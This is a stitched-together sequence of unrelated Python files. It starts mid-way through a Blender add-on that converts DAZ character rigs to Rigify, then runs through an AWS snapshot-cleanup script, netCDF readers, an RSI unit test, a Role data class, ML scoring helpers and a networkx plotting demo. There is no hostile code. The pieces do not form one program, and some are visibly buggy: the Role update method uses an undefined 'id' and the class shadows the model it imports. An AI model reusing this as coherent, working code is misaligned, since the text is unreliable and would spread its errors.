eb.name = rname
else:
raise DazError("Did not find bone %s " % dname)
bpy.ops.object.mode_set(mode='OBJECT')
def reparentBones(self, rig, parents):
bpy.ops.object.mode_set(mode='EDIT')
for bname,pname in parents.items():
if (pname in rig.data.edit_bones.keys() and
bname in rig.data.edit_bones.keys()):
eb = rig.data.edit_bones[bname]
parb = rig.data.edit_bones[pname]
eb.use_connect = False
eb.parent = parb
bpy.ops.object.mode_set(mode='OBJECT')
def setupExtras(self, rig, rigifySkel, spineBones):
extras = OrderedDict()
taken = []
for dbone,_rbone,_pbone in spineBones:
taken.append(dbone)
for _rbone, dbone in rigifySkel.items():
if isinstance(dbone, tuple):
dbone = dbone[0]
if isinstance(dbone, tuple):
dbone = dbone[0]
taken.append(dbone)
for ob in rig.children:
for vgrp in ob.vertex_groups:
if (vgrp.name not in taken and
vgrp.name in rig.data.bones.keys()):
extras[vgrp.name] = vgrp.name
for dbone in list(extras.keys()):
bone = rig.data.bones[dbone]
while bone.parent:
pname = bone.parent.name
if pname in extras.keys() or pname in taken:
break
extras[pname] = pname
bone = bone.parent
return extras
def splitBone(self, rig, bname, upname):
if upname in rig.data.bones.keys():
return
bpy.ops.object.mode_set(mode='EDIT')
eblow = rig.data.edit_bones[bname]
vec = eblow.tail - eblow.head
mid = eblow.head + vec/2
ebup = rig.data.edit_bones.new(upname)
for eb in eblow.children:
eb.parent = ebup
ebup.head = mid
ebup.tail = eblow.tail
ebup.parent = eblow
ebup.roll = eblow.roll
eblow.tail = mid
bpy.ops.object.mode_set(mode='OBJECT')
def splitNeck(self, meta):
bpy.ops.object.mode_set(mode='EDIT')
spine = meta.data.edit_bones["spine"]
spine3 = meta.data.edit_bones["spine.003"]
bonelist={}
bpy.ops.armature.select_all(action='DESELECT')
spine3.select = True
bpy.ops.armature.subdivide()
spinebones = spine.children_recursive_basename
chainlength = len(spinebones)
for x in range(chainlength):
y = str(x)
spinebones[x].name = "spine" + "." + y
for x in range(chainlength):
y = str(x+1)
spinebones[x].name = "spine" + ".00" + y
bpy.ops.armature.select_all(action='DESELECT')
bpy.ops.object.mode_set(mode='OBJECT')
def deleteIfNotExist(self, bnames, rig, meta, context):
setActiveObject(context, meta)
bpy.ops.object.mode_set(mode='EDIT')
for dname,mname in bnames:
if (dname not in rig.data.bones.keys() and
mname in meta.data.edit_bones.keys()):
eb = meta.data.edit_bones[mname]
meta.data.edit_bones.remove(eb)
bpy.ops.object.mode_set(mode='OBJECT')
setActiveObject(context, rig)
def checkRigifyEnabled(self, context):
for addon in context.user_preferences.addons:
if addon.module == "rigify":
return True
return False
def getRigifyBone(self, bname, dazSkel, extras, spineBones):
global DeformBones
if bname in DeformBones:
return DeformBones[bname]
if bname[1:] in DeformBones:
prefix = bname[0]
return (DeformBones[bname[1:]] % prefix.upper())
if bname in dazSkel.keys():
rname = dazSkel[bname]
if rname in MetaBones.keys():
return "DEF-" + MetaBones[rname]
else:
return "DEF-" + rname
elif bname in extras.keys():
return extras[bname]
else:
for dname,rname,pname in spineBones:
if dname == bname:
return "DEF-" + rname
print("MISS", bname)
return None
def getDazBones(self, rig):
# Setup info about DAZ bones
dazBones = OrderedDict()
bpy.ops.object.mode_set(mode='EDIT')
for eb in rig.data.edit_bones:
dazBones[eb.name] = DazBone(eb)
bpy.ops.object.mode_set(mode='POSE')
for pb in rig.pose.bones:
dazBones[pb.name].getPose(pb)
bpy.ops.object.mode_set(mode='OBJECT')
return dazBones
def createMeta(self, context):
from collections import OrderedDict
from .mhx import connectToParent, unhideAllObjects
from .figure import getRigType
from .merge import mergeBonesAndVgroups
print("Create metarig")
rig = context.object
scale = rig.DazScale
scn = context.scene
if not(rig and rig.type == 'ARMATURE'):
raise DazError("Rigify: %s is neither an armature nor has armature parent" % ob)
unhideAllObjects(context, rig)
# Create metarig
bpy.ops.object.mode_set(mode='OBJECT')
try:
bpy.ops.object.armature_human_metarig_add()
except AttributeError:
raise DazError("The Rigify add-on is not enabled. It is found under rigging.")
bpy.ops.object.location_clear()
bpy.ops.object.rotation_clear()
bpy.ops.object.scale_clear()
bpy.ops.transform.resize(value=(100*scale, 100*scale, 100*scale))
bpy.ops.object.transform_apply(location=False, rotation=False, scale=True)
meta = context.object
cns = meta.constraints.new('COPY_SCALE')
cns.name = "Rigify Source"
cns.target = rig
cns.mute = True
meta.DazPre278 = ("hips" in meta.data.bones.keys())
meta.DazRigifyType = getRigType(rig)
meta.DazUseBreasts = (not meta.DazPre278 and rig.data.DazExtraDrivenBones)
meta.DazUseSplitNeck = (not meta.DazPre278 and meta.DazRigifyType in ["genesis3", "genesis8"])
if meta.DazUseSplitNeck:
self.splitNeck(meta)
meta.DazRigType,hips,head = setupTables(meta)
activateObject(context, rig)
setSelected(rig, True)
bpy.ops.object.transform_apply(location=True, rotation=True, scale=True)
if meta.DazRigifyType in ["genesis1", "genesis2"]:
self.fixPelvis(rig)
self.fixCarpals(rig)
self.splitBone(rig, "chest", "chestUpper")
self.splitBone(rig, "abdomen", "abdomen2")
delbones = [
("lPectoral", "breast.L"),
("rPectoral", "breast.R"),
]
self.deleteIfNotExist(delbones, rig, meta, context)
elif meta.DazRigifyType in ["genesis3", "genesis8"]:
mergeBonesAndVgroups(rig, Genesis3Mergers, Genesis3Parents, context)
self.reparentBones(rig, Genesis3Toes)
self.renameBones(rig, Genesis3Renames)
else:
activateObject(context, meta)
deleteObject(context, meta)
raise DazError("Cannot rigify %s %s" % (meta.DazRigifyType, rig.name))
connectToParent(rig)
rigifySkel, spineBones, dazSkel = self.setupDazSkeleton(meta)
dazBones = self.getDazBones(rig)
# Fit metarig to default DAZ rig
setActiveObject(context, meta)
setSelected(meta, True)
bpy.ops.object.mode_set(mode='EDIT')
for eb in meta.data.edit_bones:
eb.use_connect = False
for eb in meta.data.edit_bones:
try:
dname = rigifySkel[eb.name]
except KeyError:
dname = None
if isinstance(dname, tuple):
dname,_vgrps = dname
if isinstance(dname, str):
if dname in dazBones.keys():
dbone = dazBones[dname]
eb.head = dbone.head
eb.tail = dbone.tail
eb.roll = dbone.roll
elif isinstance(dname, tuple):
if (dname[0] in dazBones.keys() and
dname[1] in dazBones.keys()):
dbone1 = dazBones[dname[0]]
dbone2 = dazBones[dname[1]]
eb.head = dbone1.head
eb.tail = dbone2.head
hip = meta.data.edit_bones[hips]
dbone = dazBones["hip"]
hip.tail = Vector((1,2,3))
hip.head = dbone.tail
hip.tail = dbone.head
if meta.DazRigifyType in ["genesis3", "genesis8"]:
eb = meta.data.edit_bones[head]
eb.tail = eb.head + 1.0*(eb.tail - eb.head)
self.fixHands(meta)
for suffix in [".L", ".R"]:
shoulder = meta.data.edit_bones["shoulder"+suffix]
upperarm = meta.data.edit_bones["upper_arm"+suffix]
shin = meta.data.edit_bones["shin"+suffix]
foot = meta.data.edit_bones["foot"+suffix]
toe = meta.data.edit_bones["toe"+suffix]
vec = shoulder.tail - shoulder.head
if (upperarm.head - shoulder.tail).length < 0.02*vec.length:
shoulder.tail -= 0.02*vec
if "pelvis"+suffix in meta.data.edit_bones.keys():
thigh = meta.data.edit_bones["thigh"+suffix]
pelvis = meta.data.edit_bones["pelvis"+suffix]
pelvis.head = hip.head
pelvis.tail = thigh.head
#if "breast"+suffix in meta.data.edit_bones.keys():
# breast = meta.data.edit_bones["breast"+suffix]
# breast.head[0] = breast.tail[0]
# breast.head[2] = breast.tail[2]
foot.head = shin.tail
toe.head = foot.tail
xa,ya,za = foot.head
xb,yb,zb = toe.head
heelhead = foot.head
heeltail = Vector((xa, yb-1.3*(yb-ya), zb))
mid = (toe.head + heeltail)/2
r = Vector((yb-ya,0,0))
if xa > 0:
fac = 0.3
else:
fac = -0.3
heel02head = mid + fac*r
heel02tail = mid - fac*r
if "heel"+suffix in meta.data.edit_bones.keys():
heel = meta.data.edit_bones["heel"+suffix]
heel.head = heelhead
heel.tail = heeltail
if "heel.02"+suffix in meta.data.edit_bones.keys():
heel02 = meta.data.edit_bones["heel.02"+suffix]
heel02.head = heel02head
heel02.tail = heel02tail
for eb in meta.data.edit_bones:
if (eb.parent and
eb.head == eb.parent.tail and
eb.name not in MetaDisconnect):
eb.use_connect = True
# Fix spine
mbones = meta.data.edit_bones
for dname,rname,pname in spineBones:
if dname not in dazBones.keys():
continue
dbone = dazBones[dname]
if rname in mbones.keys():
eb = mbones[rname]
else:
eb = mbones.new(dname)
eb.name = rname
eb.use_connect = False
eb.head = dbone.head
eb.tail = dbone.tail
eb.roll = dbone.roll
eb.parent = mbones[pname]
eb.use_connect = True
eb.layers = list(eb.parent.layers)
self.reparentBones(meta, MetaParents)
# Add rigify properties to spine bones
bpy.ops.object.mode_set(mode='OBJECT')
disconnect = []
connect = []
for pb in meta.pose.bones:
if "rigify_type" in pb.keys():
if pb["rigify_type"] == "":
pass
elif pb["rigify_type"] == "spines.super_head":
disconnect.append(pb.name)
elif pb["rigify_type"] == "limbs.super_finger":
connect += self.getChildren(pb)
pb.rigify_parameters.primary_rotation_axis = 'X'
elif pb["rigify_type"] == "limbs.super_limb":
pb.rigify_parameters.rotation_axis = 'x'
pb.rigify_parameters.auto_align_extremity = self.useAutoAlign
elif pb["rigify_type"] in [
"spines.super_spine",
"spines.basic_spine",
"basic.super_copy",
"limbs.super_palm",
"limbs.simple_tentacle"]:
pass
else:
print("RIGIFYTYPE %s: %s" % (pb.name, pb["rigify_type"]))
for rname,prop,value in RigifyParams:
if rname in meta.pose.bones:
pb = meta.pose.bones[rname]
setattr(pb.rigify_parameters, prop, value)
# Disconnect bones that have to be disconnected
bpy.ops.object.mode_set(mode='EDIT')
for rname in disconnect:
eb = meta.data.edit_bones[rname]
eb.use_connect = False
for rname in connect:
eb = meta.data.edit_bones[rname]
eb.use_connect = True
bpy.ops.object.mode_set(mode='OBJECT')
print("Metarig created")
return meta
def rigifyMeta(self, context, deleteMeta):
from .driver import getBoneDrivers, copyDriver, changeBoneTarget, changeDriverTarget
from .node import setParent, clearParent
from .daz import copyPropGroups
from .mhx import unhideAllObjects
from .figure import copyBoneInfo
print("Rigify metarig")
meta = context.object
rig = None
for cns in meta.constraints:
if cns.type == 'COPY_SCALE' and cns.name == "Rigify Source":
rig = cns.target
if rig is None:
raise DazError("Original rig not found")
unhideAllObjects(context, rig)
if not inSceneLayer(context, rig):
showSceneLayer(context, rig)
bpy.ops.object.mode_set(mode='POSE')
for pb in meta.pose.bones:
if hasattr(pb, "rigify_parameters"):
if hasattr (pb.rigify_parameters, "roll_alignment"):
pb.rigify_parameters.roll_alignment = "manual"
try:
bpy.ops.pose.rigify_generate()
except:
raise DazError("Cannot rigify %s rig %s " % (meta.DazRigifyType, rig.name))
scn = context.scene
gen = context.object
coll = getCollection(context)
print("Fix generated rig", gen.name)
setActiveObject(context, rig)
rigifySkel, spineBones, dazSkel = self.setupDazSkeleton(meta)
dazBones = self.getDazBones(rig)
empty = bpy.data.objects.new("Widgets", None)
coll.objects.link(empty)
empty.parent = gen
for ob in getSceneObjects(context):
if ob.parent is None and ob.name[0:4] == "WGT-":
ob.parent = empty
extras = self.setupExtras(rig, rigifySkel, spineBones)
if meta.DazUseBreasts:
for prefix in ["l", "r"]:
extras[prefix+"PectoralDrv"] = prefix+"PectoralDrv"
driven = {}
for pb in rig.pose.bones:
fcus = getBoneDrivers(rig, pb)
if fcus:
driven[pb.name] = fcus
# Add extra bones to generated rig
faceLayers = R_FACE*[False] + [True] + (31-R_FACE)*[False]
helpLayers = R_HELP*[False] + [True] + (31-R_HELP)*[False]
setActiveObject(context, gen)
bpy.ops.object.mode_set(mode='EDIT')
for dname,rname in extras.items():
if dname not in dazBones.keys():
continue
dbone = dazBones[dname]
eb = gen.data.edit_bones.new(rname)
eb.head = dbone.head
eb.tail = dbone.tail
eb.roll = dbone.roll
eb.use_deform = dbone.use_deform
if eb.use_deform:
eb.layers = faceLayers
eb.layers[R_DEFORM] = True
else:
eb.layers = helpLayers
if dname in driven.keys():
eb.layers = helpLayers
# Add parents to extra bones
for dname,rname in extras.items():
if dname not in dazBones.keys():
continue
dbone = dazBones[dname]
eb = gen.data.edit_bones[rname]
if dbone.parent:
pname = self.getRigifyBone(dbone.parent, dazSkel, extras, spineBones)
if (pname in gen.data.edit_bones.keys()):
eb.parent = gen.data.edit_bones[pname]
eb.use_connect = (eb.parent != None and eb.parent.tail == eb.head)
else:
print("No parent", dbone.name, dbone.parent, pname)
bones = list(dazSkel.keys())
bones.sort()
print("Bones:", bones)
msg = ("Bone %s has no parent %s" % (dbone.name, dbone.parent))
raise DazError(msg)
if meta.DazUseBreasts:
for prefix,suffix in [("l", ".L"), ("r", ".R")]:
db = gen.data.edit_bones[prefix + "PectoralDrv"]
eb = gen.data.edit_bones["breast" + suffix]
db.parent = eb.parent
eb.parent = db
bpy.ops.object.mode_set(mode='POSE')
# Lock extras
for dname,rname in extras.items():
if dname not in dazBones.keys():
continue
if rname in gen.pose.bones.keys():
pb = gen.pose.bones[rname]
dazBones[dname].setPose(pb)
# Remove breast custom shapes, because they are placed differently in Daz
for rname in ["breast.L", "breast.R"]:
if rname in gen.pose.bones.keys():
pb = gen.pose.bones[rname]
pb.custom_shape = None
# Rescale custom shapes
if meta.DazRigifyType in ["genesis3", "genesis8"]:
self.fixCustomShape(gen, ["head", "spine_fk.007"], 4)
if bpy.app.version >= (2,82,0):
self.fixCustomShape(gen, ["chest"], 1, Vector((0,-100*rig.DazScale,0)))
# Add DAZ properties
for key in rig.keys():
self.copyProp(key, rig, gen)
for key in rig.data.keys():
self.copyProp(key, rig.data, gen.data)
for bname,dname in rigifySkel.items():
if dname in rig.data.bones.keys():
bone = rig.data.bones[dname]
if bname in gen.data.bones.keys():
rbone = gen.data.bones[bname]
copyBoneInfo(bone, rbone)
else:
words = bname.split(".")
if len(words) == 2:
gname,suffix = words
if gname+"_fk."+suffix in gen.data.bones.keys():
fkbone = gen.data.bones[gname+"_fk."+suffix]
elif gname+".fk."+suffix in gen.data.bones.keys():
fkbone = gen.data.bones[gname+".fk."+suffix]
else:
fkbone = None
if fkbone:
copyBoneInfo(bone, fkbone)
# Handle bone parents
boneParents = []
for ob in rig.children:
if ob.parent_type == 'BONE':
boneParents.append((ob, ob.parent_bone))
clearParent(ob)
for ob,dname in boneParents:
rname = self.getRigifyBone(dname, dazSkel, extras, spineBones)
if rname and rname in gen.data.bones.keys():
print("Parent %s to bone %s" % (ob.name, rname))
bone = gen.data.bones[rname]
setParent(context, ob, gen, bone.name)
else:
print("Did not find bone parent %s %s" %(dname, rname))
setParent(context, ob, gen, None)
# Copy DAZ morph drivers and change armature modifier
activateObject(context, gen)
for ob in rig.children:
if ob.type == 'MESH':
ob.parent = gen
for dname,rname,_pname in spineBones:
if dname in ob.vertex_groups.keys():
vgrp = ob.vertex_groups[dname]
vgrp.name = "DEF-" + rname
for rname,dname in rigifySkel.items():
if dname[1:] in ["Thigh", "Shin", "Shldr", "ForeArm"]:
self.rigifySplitGroup(rname, dname, ob, rig, True, meta)
elif (meta.DazPre278 and
dname[1:] in ["Thumb1", "Index1", "Mid1", "Ring1", "Pinky1"]):
self.rigifySplitGroup(rname, dname, ob, rig, False, meta)
elif isinstance(dname, str):
if dname in ob.vertex_groups.keys():
vgrp = ob.vertex_groups[dname]
vgrp.name = "DEF-" + rname
else:
self.mergeVertexGroups(rname, dname[1], ob)
for dname,rname in extras.items():
if dname in ob.vertex_groups.keys():
vgrp = ob.vertex_groups[dname]
vgrp.name = rname
if ob.animation_data:
for fcu in ob.animation_data.drivers:
changeDriverTarget(fcu, gen)
if ob.data.animation_data:
for fcu in ob.data.animation_data.drivers:
changeDriverTarget(fcu, gen)
if ob.data.shape_keys and ob.data.shape_keys.animation_data:
for fcu in ob.data.shape_keys.animation_data.drivers:
changeDriverTarget(fcu, gen)
for mod in ob.modifiers:
if mod.type == 'ARMATURE' and mod.object == rig:
mod.object = gen
# Add generated rig to group
group = None
if bpy.app.version <= (2,80,0):
for grp in bpy.data.groups:
if rig.name in grp.objects:
group = grp
break
print("Group: %s" % group)
if group:
group.objects.link(gen)
# Fix drivers
assoc = [(rigi,daz) for (daz,rigi,_) in Genesis3Spine]
assoc += [(rigi,daz) for (rigi,daz) in RigifySkeleton.items()]
for bname, fcus in driven.items():
if bname in gen.pose.bones.keys():
if bname not in gen.pose.bones.keys():
continue
pb = gen.pose.bones[bname]
copyPropGroups(rig, gen, pb)
for fcu in fcus:
fcu2 = copyDriver(fcu, pb, gen)
changeBoneTarget(fcu2, assoc)
# Fix correctives
self.Correctives = [("ORG-"+rigi,daz) for (rigi,daz) in assoc]
self.fixCorrectives(gen)
self.checkCorrectives(gen)
#Clean up
setattr(gen.data, DrawType, 'STICK')
setattr(gen, ShowXRay, True)
gen.DazRig = meta.DazRigType
name = rig.name
activateObject(context, rig)
deleteObject(context, rig)
if deleteMeta:
activateObject(context, meta)
deleteObject(context, meta)
activateObject(context, gen)
gen.name = name
bpy.ops.object.mode_set(mode='POSE')
print("Rigify created")
return gen
def copyProp(self, prop, src, trg):
trg[prop] = src[prop]
if (hasattr(trg, "property_overridable_library_set") and
prop[0:3] not in ["Daz", "_RN"]):
trg.property_overridable_library_set('["%s"]' % prop, True)
def getChildren(self, pb):
chlist = []
for child in pb.children:
chlist.append(child.name)
chlist += self.getChildren(child)
return chlist
def rigifySplitGroup(self, rname, dname, ob, rig, before, meta):
if dname not in ob.vertex_groups.keys():
return
bone = rig.data.bones[dname]
if before:
if meta.DazPre278:
bendname = "DEF-" + rname[:-2] + ".01" + rname[-2:]
twistname = "DEF-" + rname[:-2] + ".02" + rname[-2:]
else:
bendname = "DEF-" + rname
twistname = "DEF-" + rname + ".001"
else:
bendname = "DEF-" + rname + ".01"
twistname = "DEF-" + rname + ".02"
self.splitVertexGroup(ob, dname, bendname, twistname, bone.head_local, bone.tail_local)
def mergeVertexGroups(self, rname, dnames, ob):
if not (dnames and
dnames[0] in ob.vertex_groups.keys()):
return
vgrp = ob.vertex_groups[dnames[0]]
vgrp.name = "DEF-" + rname
def setBoneName(self, bone, gen):
fkname = bone.name.replace(".", ".fk.")
if fkname in gen.data.bones.keys():
gen.data.bones[fkname]
bone.fkname = fkname
bone.ikname = fkname.replace(".fk.", ".ik")
defname = "DEF-" + bone.name
if defname in gen.data.bones.keys():
gen.data.bones[defname]
bone.realname = defname
return
defname1 = "DEF-" + bone.name + ".01"
if defname in gen.data.bones.keys():
gen.data.bones[defname1]
bone.realname1 = defname1
bone.realname2 = defname1.replace(".01.", ".02.")
return
defname1 = "DEF-" + bone.name.replace(".", ".01.")
if defname in gen.data.bones.keys():
gen.data.bones[defname1]
bone.realname1 = defname1
bone.realname2 = defname1.replace(".01.", ".02")
return
if bone.name in gen.data.bones.keys():
gen.data.edit_bones[bone.name]
bone.realname = bone.name
#-------------------------------------------------------------
# Buttons
#-------------------------------------------------------------
class DAZ_OT_RigifyDaz(DazPropsOperator, Rigify, Fixer, BendTwists, B.Rigify, B.Meta):
bl_idname = "daz.rigify_daz"
bl_label = "Convert To Rigify"
bl_description = "Convert active rig to rigify"
bl_options = {'UNDO'}
@classmethod
def poll(self, context):
ob = context.object
return (ob and ob.type == 'ARMATURE' and not ob.DazRigifyType)
def draw(self, context):
self.layout.prop(self, "useAutoAlign")
self.layout.prop(self, "deleteMeta")
def run(self, context):
import time
t1 = time.perf_counter()
print("Modifying DAZ rig to Rigify")
rig = context.object
rname = rig.name
self.createMeta(context)
gen = self.rigifyMeta(context, self.deleteMeta)
t2 = time.perf_counter()
print("DAZ rig %s successfully rigified in %.3f seconds" % (rname, t2-t1))
class DAZ_OT_CreateMeta(DazPropsOperator, Rigify, Fixer, BendTwists, B.Meta):
bl_idname = "daz.create_meta"
bl_label = "Create Metarig"
bl_description = "Create a metarig from the active rig"
bl_options = {'UNDO'}
@classmethod
def poll(self, context):
ob = context.object
return (ob and ob.type == 'ARMATURE' and not ob.DazRigifyType)
def draw(self, context):
self.layout.prop(self, "useAutoAlign")
def run(self, context):
self.createMeta(context)
class DAZ_OT_RigifyMetaRig(DazOperator, Rigify, Fixer, BendTwists):
bl_idname = "daz.rigify_meta"
bl_label = "Rigify Metarig"
bl_description = "Convert metarig to rigify"
bl_options = {'UNDO'}
@classmethod
def poll(self, context):
return (context.object and context.object.DazRigifyType)
def run(self, context):
self.rigifyMeta(context, False)
#-------------------------------------------------------------
# List bones
#-------------------------------------------------------------
def listBones(context):
rig = context.object
if not (rig and rig.type == 'ARMATURE'):
msg = ("Not an armature: \n'%s' " % rig)
raise DazError(msg)
print("Bones in %s:" % rig.name)
for pb in rig.pose.bones:
print(' "%s" : ("", "%s"),' % (pb.name, pb.rotation_mode))
class DAZ_OT_ListBones(DazOperator, IsArmature):
bl_idname = "daz.list_bones"
bl_label = "List Bones"
bl_options = {'UNDO'}
def run(self, context):
listBones(context)
#----------------------------------------------------------
# Initialize
#----------------------------------------------------------
classes = [
DAZ_OT_RigifyDaz,
DAZ_OT_CreateMeta,
DAZ_OT_RigifyMetaRig,
DAZ_OT_ListBones,
]
def initialize():
bpy.types.Object.DazRigifyType = StringProperty(default="")
bpy.types.Object.DazRigType = StringProperty(default="")
bpy.types.Object.DazUseBreasts = BoolProperty(default=False)
bpy.types.Object.DazUseSplitNeck = BoolProperty(default=False)
bpy.types.Object.DazPre278 = BoolProperty(default=False)
for cls in classes:
bpy.utils.register_class(cls)
def uninitialize():
for cls in classes:
bpy.utils.unregister_class(cls)
|
#!/usr/bin/python
from datetime import datetime, date, timedelta
import os
import sys; sys.path += ['/var/canvas/common', '../../common']
import yaml
from collections import defaultdict
from boto.ec2.connection import EC2Connection
from configuration import aws
def clean_backups():
"""
dumb script that cleans up all the duplicate ebs snapshots our two cron servers
create while backing up redis
"""
conn = EC2Connection(*aws)
snapshots = conn.get_all_snapshots()
shots = defaultdict(list)
for snapshot in conn.get_all_snapshots(owner=352407978521):
if snapshot.tags.get('Name') is not None:
t = snapshot.tags['Name']
ttype = ""
if 'Pink' in t:
ttype = 'pink'
elif 'Yellow' in t:
ttype = 'yellow'
dt = datetime.strptime(snapshot.start_time, "%Y-%m-%dT%H:%M:%S.000Z")
key = (ttype, dt.year, dt.month, dt.day)
val = snapshot.id
shots[key].append(val)
to_delete = []
for k, v in shots.iteritems():
if len(v) >= 2:
to_delete.append(v[0])
for d in to_delete:
print "deleting", d, "..."
conn.delete_snapshot(d)
if __name__ == '__main__':
clean_backups() |
from DeepModel.AlexNet import AlexNet, AlexCNN
from DeepModel.NNutil import *
from DeepModel.ResNet import Resnet_improve, ResNet_18
from DeepModel.ResNet_deeper import ResNet101, ResNet50, ResNet152
from DeepModel.ResNet_deeper import ResNet_deeper
from DeepModel.SimpleCNN import SCNN, LeNet5
from DeepModel.SimpleFullConnection import SFCN, SFCNet, Improve_SFCNet
from DeepModel.TextProcessing import bitwise_16, bitwise_8, bitwise_4, bitwise_32
from DeepModel.VGGNet import VGG, VGG_11
from DeepModel.data_preparation import data_loader
|
import netCDF4 as nc #case matters for importing netCDF4 module
import numpy as np
# read netCDF "metadata"
def open_netCDF_meta(path,key):
data = nc.Dataset(path)
return data.__dict__[key]
# read netCDF "dimensions"
def open_netCDF_dimension(path,key):
data = nc.Dataset(path)
return data.dimensions[key]
# read netCDF "variables"
def open_netCDF_variable(path,key):
data = nc.Dataset(path)
return data.variables[key][:] #add something here to convert to np array (return np.something?) |
import unittest
import unittest.mock
import decimal
import prosperpy
def get_candles():
data = ['44.34', '44.09', '44.15', '43.61', '44.33', '44.83', '45.10', '45.42', '45.84', '46.08', '45.89', '46.03',
'45.61', '46.28', '46.28', '46.00', '46.03', '46.41', '46.22', '45.64', '46.21', '46.25', '45.71', '46.45',
'45.78', '45.35', '44.03', '44.18', '44.22', '44.57', '43.42', '42.66', '43.13']
candles = []
for index, item in enumerate(data):
close = decimal.Decimal(item)
candle = prosperpy.Candle(close=close)
try:
candle.previous = candles[index-1]
except IndexError:
pass
candles.append(candle)
return candles
class TestRelativeStrengthIndex(unittest.TestCase):
def test_relative_strength_index(self):
period = 14
candles = get_candles()
data = ['66.24961855355508', '66.48094183471267', '69.34685316290870', '66.29471265892625', '57.91502067008556',
'62.88071830996238', '63.20878871828775', '56.01158478954756', '62.33992931089785', '54.67097137765515',
'50.38681519511423', '40.01942379131357', '41.49263540422286', '41.90242967845816', '45.49949723868043',
'37.32277831337997', '33.09048257272346', '37.78877198205783']
data = [decimal.Decimal(item) for item in data]
rsi = prosperpy.indicators.RelativeStrengthIndex(candles[1:period+1])
self.assertEqual(rsi.period, period)
self.assertEqual(rsi.value, decimal.Decimal('70.46413502109705'))
for candle, value in zip(candles[period+1:], data):
rsi.add(candle)
self.assertEqual(rsi.value, value)
def test_zero_average_gain(self):
period = 14
candles = get_candles()
rsi = prosperpy.indicators.RelativeStrengthIndex(candles[1:period + 1])
rsi.average_gain = 0
self.assertEqual(rsi.value, decimal.Decimal('0.0'))
def test_zero_average_loss(self):
period = 14
candles = get_candles()
rsi = prosperpy.indicators.RelativeStrengthIndex(candles[1:period + 1])
rsi.average_loss = 0
self.assertEqual(rsi.value, decimal.Decimal('100.0'))
if __name__ == '__main__':
unittest.main()
|
from python_to_you.models import Role
class Role():
def __init__(self):
self.role = Role
def get(self, id):
return self.role.query.filter_by(id=id).first()
def create(self, user_id, is_admin):
role = self.role(
user_id,
is_admin
)
self.role.session.add(role)
self.role.session.commit()
def update(self, user_id, is_admin):
role = self.role.query.filter_by(id=id).first()
role.user_id = user_id
role.is_admin = is_admin
role.session.commit() |
"""
helper_fxns.py
by Benjamin Hamilton
------------------------------------------
A few helper functions that were aggregated from activities I found myself repeating.
Included are
- graphing feature importance (created for CatBoost but should work
with relevant sklearn models
- mass scoring that generates a number of categorical scores, as well as
confusion matrices (it needs a loss. Perhaps add one later)
for CV and Holdout data
"""
# Import the usual suspects
import pandas as pd
import numpy as np
import matplotlib.pyplot as plt
import seaborn as sns
# Scorers of various sorts
from sklearn.metrics import accuracy_score, confusion_matrix, f1_score, classification_report
from sklearn.metrics import precision_recall_fscore_support
from sklearn.metrics import make_scorer
def feature_imp(model,X,text=True,head=10,graph=True,title='Feature Importance',fgsz=(12,12)):
""" Generate a graph with feature importances, given a fit model 'model', for a dataset X
model: a model that has been fit that has a feature_importances_ method
X: a dataset, typically as a dataframe
text = True: prints out the feature importances
head = 10: the number of lines of feature importances to print out
graph = True: print graph
title = 'Feature Importance': title of the graph
fgsz = (12,12): size of the graph. 12,12 is great for examining but 6,6 may be better if you have
many models in a single notebook.
"""
# Feature Importances
A = pd.DataFrame(model.feature_importances_)
# Feature Names
Xc = pd.DataFrame(X.columns)
# Create a data set Mat that has all the feature importance values
# concatenated to each respective feature name
Mat = pd.concat([Xc,A],axis=1)
#Rename columns
Mat.columns=['features','importance']
if text == True:
print(Mat.sort_values('importance',ascending=False).head(head))
# Seaborn Barplot graph
if graph==True:
sns.set_style('darkgrid')
plt.figure(figsize=fgsz)
ax = sns.barplot(x='features',y='importance',data=Mat)
ax.set_xticklabels(ax.get_xticklabels(),rotation = 90)
plt.title(title)
plt.show()
# Mass Scoring Function
def mass_scoring(y,y_pred,title='Train'):
"""
Input classification truth and predictions (not probabilities)
Returns a list with precision, recall, f1, and support for both micro and weighted averages
Prints f1/acc, f1(wt), and confusion matrix
title='Train': Title of the data, such as 'CV', 'Holdout'
The precision,recall,fscore,support are all delivered returned list X_scores
To extract measures that use micro average:
X_scores[0] is precision, X_scores[1] is recall, X_scores[2] is f1, X_scores[3] is support\
Tp extract measures that use weighted average:
X_scores[4] is precision, X_scores[5] is recall, X_scores[6] is f1, X_scores[7] is support
"""
# precision, recall, f1 and support function from sklearn
prfs_mic = precision_recall_fscore_support(y,y_pred,average='micro')
prfs_wt = precision_recall_fscore_support(y,y_pred,average='weighted')
# Individual components of each
f1mic = prfs_mic[2]
f1wt = prfs_wt[2]
rmic = prfs_mic[1]
rwt = prfs_wt[1]
pmic = prfs_mic[0]
pwt = prfs_wt[0]
smic = prfs_mic[3]
swt = prfs_wt[3]
conf_mat = confusion_matrix(y,y_pred)
# Print the f1/acc, f1(wt) and confusion matrix
print('\n'+title+' Data: ')
print('f1(micro)/acc: '+str(f1mic)+', f1(wt): '+str(f1wt))
print('Confusion Matrix (' + title +'):')
print(pd.DataFrame(conf_mat))
# create a list of all scores and return them
X_scores = [prfs_mic,prfs_wt]
return X_scores |
import matplotlib.pyplot as plt
import networkx as nx
import pdb
G = nx.Graph()
G.add_edge('a', 'b', weight=0.6)
G.add_edge('a', 'c', weight=0.2)
G.add_edge('c', 'd', weight=0.1)
G.add_edge('c', 'e', weight=0.7)
G.add_edge('c', 'f', weight=0.9)
G.add_edge('a', 'd', weight=0.3)
elarge = [(u, v) for (u, v, d) in G.edges(data=True) if d['weight'] > 0.5]
esmall = [(u, v) for (u, v, d) in G.edges(data=True) if d['weight'] <= 0.5]
pos = nx.spring_layout(G) # positions for all nodes
# nodes
nx.draw_networkx_nodes(G, pos, node_size=700)
# edges
nx.draw_networkx_edges(G, pos, edgelist=elarge,
width=6)
nx.draw_networkx_edges(G, pos, edgelist=esmall,
width=6, alpha=0.5, edge_color='b', style='dashed')
# labels
new_labels = dict(map(lambda x:((x[0],x[1]), str(x[2]['weight'] if x[2]['weight']<=3 else "") ), G.edges(data = True)))
nx.draw_networkx_labels(G, pos, font_size=20, font_family='sans-serif')
nx.draw_networkx_edge_labels(G, pos, font_size=15, font_family='sans-serif', edge_labels=new_labels)
plt.axis('off')
plt.show()
|
from . import BASE_CONTEXT
from .dataobject import DataObject, ObjectProperty, This
from .context_common import CONTEXT_IMPORTS
# ContextDataObject was moved to a separate module from Context to avoid a dependency
# cycle with dataobject
class ContextDataObject(DataObject):
""" Represents a context """
class_context = BASE_CONTEXT
